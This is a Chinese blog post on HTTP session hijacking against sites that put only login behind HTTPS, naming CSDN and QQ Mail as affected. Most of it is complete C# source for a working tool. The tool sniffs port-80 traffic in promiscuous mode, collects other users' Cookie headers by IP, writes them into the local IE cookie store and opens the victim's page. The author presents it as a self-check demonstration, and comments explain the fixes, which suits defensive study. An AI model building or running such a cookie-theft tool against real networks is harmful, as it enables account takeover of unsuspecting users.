58 同城的用户登录是采用了 HTTPS 的,仍然逃不过会话劫持。大部分较规范的网站,都是类似模式:登录采用 HTTPS,主要流量走 HTTP。
随手测试发现,使用该模式的站点,包括 csdn、qq 邮箱(是的它竟然还有 http 版的)等等,很多都未做到会话劫持免疫。博客园其实也中招了,但它把敏感操作都放到了 HTTPS,所以没太多影响。
其实,对于用 HTTP 走流量、HTTPS 走认证的站点,略施改造,是可以对会话劫持免疫的。各大网站可以自行下载我的程序自查是否存在缺陷,我可以提供针对性免疫补丁支持。
以下是该示例的主要代码,蛮简单,引用了 Pcap.NET 组件,需要对应安装 WinPcap。基于该组件的网络数据包嗅探,只是做会话劫持的一种途径,而且有应用局限性,所以示例代码更多是一个演示程序而非黑客工具。下面会具体讲到。
想跟进最新代码的还请 watch 我 github 上源码:https://github.com/baibaomen/Baibaomen.HttpHijacker
- using PcapDotNet.Core;
- using PcapDotNet.Packets;
- using System;
- using System.Collections.Concurrent;
- using System.Collections.Generic;
- using System.Diagnostics;
- using System.Linq;
- using System.Runtime.InteropServices;
- using System.Text;
- using System.Threading.Tasks;
- using System.Windows.Forms;
- namespace Baibaomen.HttpHijacker
- {
public partial class FormHijacker : Form
{
    // NOTE(review): this listing is a whitespace-mangled paste ("varsourceIP",
    // "newConcurrentDictionary", "voidFormHijacker_Load", ...); spacing below is
    // restored, the tokens themselves are left exactly as pasted.

    /// <summary>
    /// Cookies observed per sniffed client. Outer key: the client's source IPv4
    /// address; inner key: the request's Host header; value: the raw Cookie header.
    /// Only ever populated from plaintext HTTP requests to port 80 (see the capture
    /// filter in StartHijack), which is the exposure this demo relies on.
    /// </summary>
    ConcurrentDictionary<string, ConcurrentDictionary<string,string>> clientCookies = new ConcurrentDictionary<string, ConcurrentDictionary<string,string>>();

    public FormHijacker()
    {
        InitializeComponent();
    }

    /// <summary>Form load handler: starts capturing immediately.</summary>
    private void FormHijacker_Load(object sender, EventArgs e)
    {
        StartHijack();
    }

    /// <summary>
    /// Starts one background capture loop per local adapter. Each adapter is opened
    /// in promiscuous mode with a kernel filter of "tcp and dst port 80", so only
    /// unencrypted HTTP is inspected; port-443 (HTTPS) traffic is never looked at.
    /// That is the weakness being demonstrated: whatever a browser sends over
    /// http:// on a shared segment — including a session cookie that lacks the
    /// Secure attribute — is readable by any other host on that segment.
    /// </summary>
    public void StartHijack()
    {
        Task.Run(delegate
        {
            // NOTE(review): the generic type argument appears to have been lost in
            // the paste — a non-generic IList would make "selectedDevice.Open" below
            // fail to compile (var would be object). Confirm against the repository.
            IList allDevices = LivePacketDevice.AllLocalMachine;
            if (allDevices.Count == 0)
            {
                MessageBox.Show("未找到网卡。请确认已安装WinPcap。");
                return;
            }
            foreach (var selectedDevice in allDevices)
            {
                Task.Run(delegate
                {
                    // 65536-byte snapshot length, 1000 ms read timeout. The communicator
                    // is not disposed in this block; presumably ReceivePackets(0, ...)
                    // runs without a packet limit — confirm against the Pcap.NET docs.
                    PacketCommunicator communicator =
                        selectedDevice.Open(65536, PacketDeviceOpenAttributes.Promiscuous, 1000);
                    if (communicator.DataLink.Kind != DataLinkKind.Ethernet)
                    {
                        return;
                    }
                    // BPF filter applied in the driver: TCP segments toward port 80 only.
                    using (BerkeleyPacketFilter filter = communicator.CreateFilter("tcp and dst port 80"))
                    {
                        communicator.SetFilter(filter);
                    }
                    communicator.ReceivePackets(0, PacketHandler);
                });
            }
            // UI updates must go through the form's thread.
            this.BeginInvoke(new EventHandler(delegate
            {
                lbMsg.Text = "监听已启动";
            }));
        });
    }

    /// <summary>
    /// Per-packet callback. For every valid HTTP request it records the Host and
    /// Cookie header values under the sender's IP, and lists page-level GET requests
    /// (Accept: text/html or text/plain) in the UI so one can be selected for replay.
    /// Everything read here was emitted in cleartext by the client's browser: a cookie
    /// carrying the Secure attribute is never sent on http:// and so would not appear
    /// in the Cookie header, and a site enforcing HSTS would not have produced the
    /// http:// request in the first place.
    /// </summary>
    private void PacketHandler(Packet packet)
    {
        try
        {
            // Evaluated before the null-conditional chain on the next line, so a
            // non-IPv4 frame throws here and is discarded by the catch below.
            var sourceIP = packet.Ethernet.IpV4.Source.ToString();
            var http = packet?.Ethernet?.IpV4?.Tcp.Http;
            if (http == null || http.Header == null) return;
            if (http.IsRequest && http.IsValid)
            {
                String msg = http.Decode(Encoding.UTF8);
                // Only intercept page-content requests.
                if (!string.IsNullOrEmpty(msg))
                {
                    var lines = msg.Split(new string[] { "\r\n" }, StringSplitOptions.RemoveEmptyEntries);
                    // Header values are picked by case-sensitive prefix match on the
                    // exact spellings "Host: " and "Cookie: "; other casings are ignored.
                    var host = lines.FirstOrDefault(x => x.StartsWith("Host: "))?.Substring("Host: ".Length);
                    var cookie = lines.FirstOrDefault(x => x.StartsWith("Cookie: "))?.Substring("Cookie: ".Length);
                    if (string.IsNullOrEmpty(host)) return;
                    if (!string.IsNullOrEmpty(cookie))
                    {
                        // Most recent Cookie header per (client IP, Host) wins.
                        var cCookies = clientCookies.GetOrAdd(sourceIP, new ConcurrentDictionary<string,string>());
                        cCookies.AddOrUpdate(host, cookie, (key, oldVal) => cookie);
                    }
                    // Filter out requests for resource files etc. to keep the data cleaner.
                    if (msg.StartsWith("GET ") && (msg.Contains("\nAccept: text/html") || msg.Contains("\nAccept: text/plain")))
                    {
                        // Request-target from the request line: drop "GET " and " HTTP/x.y".
                        var pathAndQuery = lines[0].Substring(0, lines[0].LastIndexOf(" HTTP/")).Substring("GET ".Length);
                        this.BeginInvoke(new EventHandler(delegate
                        {
                            // Entry format "ip<TAB>timestamp<TAB>url" is parsed back in btnHijack_Click.
                            lstSessions.Items.Insert(0, $"{sourceIP}\t{DateTime.Now}\thttp://{host + pathAndQuery}");
                        }));
                    }
                }
            }
        }
        catch // Sniffed data may be incomplete; drop the packet.
        {
        }
    }

    /// <summary>
    /// WinINet InternetSetCookie: writes a cookie for the given URL into the local
    /// WinINet cookie store that Internet Explorer reads. Used in btnHijack_Click to
    /// plant the captured cookies before launching iexplore.exe.
    /// </summary>
    [DllImport("wininet.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern bool InternetSetCookie(string lpszUrlName, string lbszCookieName, string lpszCookieData);

    /// <summary>
    /// Replays the selected session: every cookie recorded for the selected client IP
    /// is written into the local cookie store under "http://" + host with a 10-minute
    /// expiry, then Internet Explorer is opened on the captured URL. This succeeds only
    /// because the server accepts a session cookie that it previously allowed to travel
    /// in cleartext; serving the whole site over HTTPS, marking session cookies Secure
    /// and enabling HSTS removes the exposure rather than trying to spot the replay.
    /// </summary>
    private void btnHijack_Click(object sender, EventArgs e)
    {
        var selected = lstSessions.SelectedItem;
        if (selected == null)
        {
            MessageBox.Show("请选择待劫持会话");
            return;
        }
        // List entries are "ip\ttimestamp\turl" as inserted by PacketHandler.
        var segments = selected.ToString().Split('\t');
        var ip = segments[0];
        var url = segments[2];
        // NOTE(review): the indexer presumably throws KeyNotFoundException when no
        // Cookie header was ever seen from this IP — PacketHandler lists a GET even
        // when the request carried no cookie. Confirm against ConcurrentDictionary docs.
        var cookies = clientCookies[ip];
        foreach (var domainCookie in cookies) // Set the captured cookies as the browser's cookies.
        {
            foreach (var item in domainCookie.Value.Split(';'))
            {
                try
                {
                    // "name=value" pairs from the raw Cookie header; name is trimmed, value is not.
                    var name = item.Substring(0, item.IndexOf('=')).Trim();
                    var value = item.Substring(item.IndexOf('=') + 1);
                    InternetSetCookie(
                        "http://" + domainCookie.Key,
                        name,
                        value + ";expires=" + DateTime.UtcNow.AddMinutes(10).ToString("R"));
                }
                catch { } // Some entries are malformed; sniffed data may be incomplete, drop them.
            }
        }
        if (lstSessions.SelectedItem != null)
        {
            Process.Start("iexplore.exe", url);
        }
    }
}
- }
来源: http://www.cnblogs.com/baibaomen/p/http-session-hijack.html